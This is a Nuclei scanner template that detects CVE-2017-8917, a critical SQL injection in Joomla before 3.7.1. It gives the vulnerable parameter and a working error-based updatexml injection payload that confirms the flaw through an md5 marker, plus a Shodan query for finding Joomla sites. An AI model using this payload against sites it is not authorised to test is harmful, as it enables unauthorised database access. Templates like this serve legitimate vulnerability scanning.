nuclei-templates/http/cves/2017/CVE-2017-8917.yaml

42 lines
1.3 KiB
YAML

id: CVE-2017-8917
info:
name: Joomla! <3.7.1 - SQL Injection
author: princechaddha
severity: critical
description: |
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
- http://www.securitytracker.com/id/1038522
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-8917
cwe-id: CWE-89
epss-score: 0.97555
cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:*
epss-percentile: 0.99994
metadata:
max-request: 1
shodan-query: http.component:"Joomla"
verified: true
vendor: joomla
product: joomla\!
tags: cve,cve2017,joomla,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'